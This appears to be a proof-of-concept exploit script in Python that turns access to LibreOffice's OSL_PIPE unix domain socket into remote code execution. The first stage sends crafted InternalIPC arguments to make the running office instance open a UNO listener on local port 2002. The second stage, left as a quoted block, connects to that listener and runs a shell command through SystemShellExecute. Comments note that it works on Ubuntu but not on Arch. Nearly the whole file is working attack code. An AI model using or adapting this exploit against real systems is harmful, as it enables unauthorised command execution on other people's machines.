libreoffice_domain_socket_to_rce.py

from pathlib import Path
import socket
import time

# RCE when having access to unix sockets
# TODO: start a named_pipe instead

# first stage: start uno api

# OSL PIPE apparently used for quick starts when libreoffice is already started

unix_socket = str(next(Path("/tmp").rglob("OSL_PIPE_*")))
#args = b"InternalIPC::Arguments1file:///tmp,/home/roman/Documents/TestDokument.pdf\0"
args = b"InternalIPC::Arguments1file:///tmp,--headless,--accept=socket\\,host=127.0.0.1\\,port=2002;urp;StarOffice.Service\0"

server = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
print(f"Connecting to socket {unix_socket}...")
server.connect(unix_socket)
print(f"Connected to socket {unix_socket}.")
data = server.recv(1024)
print(f"< {str(data)}")
print(">", str(args))
server.send(args)
time.sleep(1)
data = server.recv(1024)
print(">", str(args))
server.close()

# second stage: run command using SystemShellExecute
# is broken on arch somehow, works on ubuntu.
"""
import uno
from com.sun.star.system import XSystemShellExecute
localContext = uno.getComponentContext()
resolver = localContext.ServiceManager.createInstanceWithContext("com.sun.star.bridge.UnoUrlResolver", localContext )
context = resolver.resolve("uno:socket,host=127.0.0.1,port=2002;urp;StarOffice.ComponentContext")
service_manager = context.ServiceManager
shell_execute = service_manager.createInstance("com.sun.star.system.SystemShellExecute")
shell_execute.execute("id", '',1)
"""